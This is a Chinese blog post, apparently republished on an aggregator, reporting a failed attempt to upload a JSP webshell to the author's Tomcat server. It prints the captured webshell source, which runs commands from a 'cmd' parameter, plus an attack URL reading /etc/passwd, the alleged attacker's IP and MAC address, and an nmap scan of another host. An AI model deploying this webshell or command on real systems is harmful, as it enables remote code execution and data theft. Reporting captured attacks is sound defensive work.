码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 网络安全之WebShell截获


    不知道这是哪个大哥的手笔有没有认领的20240424十一点四十分左右

    大哥计算机的具体信息贴上了,还好大哥没有put成功,返回405!

    IP地址
    31.49.67.43:36668
    MAC地址
    80:05:88:48:37:b5
    
    • 1
    • 2
    • 3
    • 4
    1. ToolB的MAC地址厂商信息查询网站:https://toolb.cn/mac-address
    2. WaveCN.com的以太网MAC地址查询工具:https://www.wavecn.com/mac.php
    3. MAC地址查询网站,提供根据网卡MAC地址查询厂商信息:https://mac.bmcx.com/
    4. ITOOL的MAC地址查询在线工具:https://itool.co/mac
    5. MiniWebtool的MAC地址查找工具:https://miniwebtool.com/zh-cn/mac-address-lookup/
    6. MAC地址查询方法网站:https://mac.chacd.com/
    7. Strerr.com的MAC地址查询,网卡OUI制造商查询:https://www.strerr.com/cn/mac-address-lookup.html
    8. LZLTool的MAC地址批量查询网站:https://www.lzltool.cn/mac
    9. DNSChecker的MAC地址查找工具:https://dnschecker.cloud/cn/mac-lookup.html
    10. BCZS的MAC查询,专业免费MAC地址网卡地址蓝牙地址查询:http://mac.bczs.net/

    WEB攻击】SERVER-APACHE Apache Tomcat 远程jsp文件上传尝试

    <%@ page import="java.util.*,java.io.*"%>
    <%
    if (request.getParameter("cmd") != null) {
    out.println("Command: " request.getParameter("cmd") "
    "
    ); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    http://xxx.xxx.xxx.xxxx:xxxx/y021.jsp/
    
    • 1

    没上传成功别难受,祝你在其他地放也上传不成功!!

    http://xxx.xxx.xxx.xxxx:xxxx/y021.jsp?cmd= cat+/etc/passwd
    
    • 1

    请求头分析

    怎么回事,请求头也上代理吗?没必要,反正你也成功不了
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
    
    • 1
    • 2

    这个大哥攻击成功了

    http://120.77.82.232:8080/
    但是开放了一些端口,就不干你了
    
    • 1
    • 2
    C:\Users\hi>nmap -sV 120.77.82.232
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-24 15:26 中国标准时间
    NSOCK ERROR [0.0770s] ssl_init_helper(): OpenSSL legacy provider failed to load.
    
    Nmap scan report for 120.77.82.232
    Host is up (0.040s latency).
    Not shown: 991 filtered tcp ports (no-response)
    PORT     STATE  SERVICE        VERSION
    22/tcp   closed ssh
    53/tcp   closed domain
    113/tcp  closed ident
    1080/tcp closed socks
    1688/tcp open   nsjtp-data?
    3389/tcp closed ms-wbt-server
    5566/tcp closed westec-connect
    6000/tcp closed X11
    8080/tcp open   http           SimpleHTTPServer 0.6 (Python 3.9.2)
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port1688-TCP:V=7.93%I=7%D=4/24%Time=6628B473%P=i686-pc-windows-windows%
    SF:r(WMSRequest,20,"\x05\0\x03#\x10\0\0\0\x20\0\0\0\x02\0\0\0\x20\0\0\0\0\
    SF:0\0\0\x03\0\x01\x1c\0\0\0\0");
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 79.27 seconds
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
  • 相关阅读:
    [Linux]----文件操作(复习C语言+文件描述符)
    JavaSE_Java复习基本搜索树的实现
    【BotR】CLR类型系统
    【c语言基础题】— —第五版,可当作日常练习和期末复习,有奇效哟!
    蚁创互联告诉您何为品牌霸屏?“品牌霸屏”是什么意思呢?
    Elasticsearch:使用向量搜索来搜索图片及文字
    springboot基础(28):jdbcTemplate
    匈牙利算法 -- Acwing 861. 二分图的最大匹配
    Android之MediaMetricsService实现本质(四十二)
    数据链路层的七七八八
  • 原文地址:https://blog.csdn.net/qq_43681990/article/details/138159525
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号